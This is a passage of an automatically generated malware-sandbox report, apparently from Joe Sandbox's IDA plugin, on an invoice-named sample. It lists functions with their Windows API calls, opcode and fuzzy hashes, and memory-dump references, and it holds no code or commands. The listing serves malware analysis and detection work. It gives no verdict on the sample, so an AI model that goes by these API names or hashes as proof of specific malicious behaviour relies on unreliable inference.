                                          • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                          • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00402231
                                          • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00402250
                                          • GetStockObject.GDI32(00000005), ref: 00402258
                                          • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                          • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                          • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                          • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                          • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                          • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 0045871B
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                          • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                          • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                          • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %I
                                          • API String ID: 0-63094095
                                          • Opcode ID: a0a18856917c951dd355d68e039e149d8170a3ecbb95557f171f7bf658f6a256
                                          • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                          • Opcode Fuzzy Hash: a0a18856917c951dd355d68e039e149d8170a3ecbb95557f171f7bf658f6a256
                                          • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __itow_s
                                          • String ID: xbL$xbL
                                          • API String ID: 3653519197-3351732020
                                          • Opcode ID: c5469b7ac0b3c7661acd055f50eea0ef8a1bc667476caa33fb8e4b48a346c8ff
                                          • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                          • Opcode Fuzzy Hash: c5469b7ac0b3c7661acd055f50eea0ef8a1bc667476caa33fb8e4b48a346c8ff
                                          • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                          APIs
                                            • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • __wcsnicmp.LIBCMT ref: 0046B02D
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                          • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                          • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                          • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00412968
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                          • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                          • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                          • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                          APIs
                                            • Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29
                                          • _wcscmp.LIBCMT ref: 00469824
                                          • _wcscmp.LIBCMT ref: 00469837
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                          • Instruction ID: cde52b3ca8712c625de002da450250744642bb9d8a04c3b997614ed6dba67ccd
                                          • Opcode Fuzzy Hash: 61b9d9cc128ec34272c66af4fd2f1fdd343520f55c014a8993afaf0baf9333d9
                                          • Instruction Fuzzy Hash: 8C41A771A0021ABADF20AAA5CC45FEF77BDDF85714F00047EB604B7181DA79AD058B69
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID: DdL$DdL
                                          • API String ID: 1473721057-91670653
                                          • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                          • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                          • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                          • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                          APIs
                                          • _memset.LIBCMT ref: 0047259E
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                          • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                          • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                          • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                          • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                          • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                          • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                          APIs
                                          • _memset.LIBCMT ref: 00462911
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 92f9e9f041086d142ac39036aa78b8e8b2e32160e262157300fe5ac97b1e7f6d
                                          • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                          • Opcode Fuzzy Hash: 92f9e9f041086d142ac39036aa78b8e8b2e32160e262157300fe5ac97b1e7f6d
                                          • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                          • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                          • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                          • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                          APIs
                                            • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                            • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                            • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                          • GetSysColor.USER32(00000012), ref: 00486C8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                          • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                          • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                          • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                          • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                          • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                          • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                          APIs
                                          • _memset.LIBCMT ref: 00462A22
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                          • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                          • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                          • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                          • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                          • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                          • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • _wcscat.LIBCMT ref: 00444CB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
